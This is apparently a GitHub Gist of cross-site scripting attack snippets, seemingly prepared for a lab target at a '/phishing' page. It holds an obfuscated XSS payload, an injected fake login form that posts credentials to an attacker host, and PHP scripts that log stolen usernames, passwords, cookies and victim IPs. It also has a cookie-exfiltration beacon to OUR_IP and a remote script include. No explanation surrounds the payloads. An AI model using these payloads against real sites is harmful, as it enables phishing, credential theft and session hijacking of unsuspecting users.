-
-
Save HoiDam/529ed05e64b526a95533f7dd0e941d3b to your computer and use it in GitHub Desktop.
http://10.129.32.165/phishing/index.php?url='><Html%0DOnPoiNTerEnter%0A=%0A(confirm)( | |
)%0Dx> |
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
<?php if (isset($_GET['username']) && isset($_GET['password'])) { $file = fopen("creds.txt", "a+"); fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n"); header("Location: http://SERVER_IP/phishing/index.php"); fclose($file); exit(); } ?>
<?php if (isset($_GET['c'])) { $list = explode(";", $_GET['c']); foreach ($list as $key => $value) { $cookie = urldecode($value); $file = fopen("cookies.txt", "a+"); fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n"); fclose($file); } } ?>
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
"><script src=http://10.10.15.4/script.js></script>
.